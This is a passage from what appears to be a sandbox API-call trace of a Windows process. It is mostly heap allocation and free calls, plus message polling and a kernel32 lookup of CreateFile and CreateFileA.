dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.396] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0171.396] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.396] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.397] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0171.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0171.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0171.397] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0171.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.400] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.402] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0171.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4e0 [0171.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0171.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.403] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0171.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0171.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0171.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.403] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0171.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 